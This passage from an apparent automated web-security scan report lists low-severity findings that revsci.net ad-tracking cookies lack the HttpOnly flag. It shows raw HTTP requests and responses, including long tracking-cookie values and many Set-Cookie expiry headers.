hsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

12.57. http://pix04.revsci.net/F09828/a4/0/0/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

12.58. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/304415100.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F04%252Fus-weather-football-idUSTRE78222D20110904%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="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"; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spZQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yNA1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ymBV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UZSm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jxkC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_U-2H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MHAh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mC_w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hJ1L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a0q5=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CGuf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vcWj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UeD7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NZMh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gtXn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Gz72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I_s8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Yae=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_13QU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yd99=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kx93=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vjxv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i6y7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ci3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BIfh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hlh0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fVrw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UYkU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vq52=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p_N7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_swop=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DAhz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_36jJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EGaf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yqe4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Xkff=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PotF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6iIy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rG0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bmc9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AIz7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_owhI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YG_I=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ttgh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qIL0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zoqu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wj7v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8_Kd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HV6c=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lX7E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMvP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PMyZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qp5L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LM_E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qsf6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vgZJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vs0v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5KhS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__-hU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e4dU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tBSl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1hrT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cAs9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ufy6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zbl-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kzjM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4dwc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_7nfY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TXTA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ifOy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uXx-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SZmK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VzFl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MYGJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ePg8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2b4r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BSfF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xPU8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MM9p=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KwBW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NX3a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QdlW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HkOY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8S1T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jqXq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bM22=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cSyo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__g8N=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vWFu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sm2o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aHEk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_trlL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_S6yp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_46IH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fPgs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vtS4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q7Ad=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uQON=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1YTe=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRRI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iCxA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wveS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IoVb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XSck=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
Set-Cookie: rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:56:55 GMT
Content-Length: 730

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

12.59. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; 
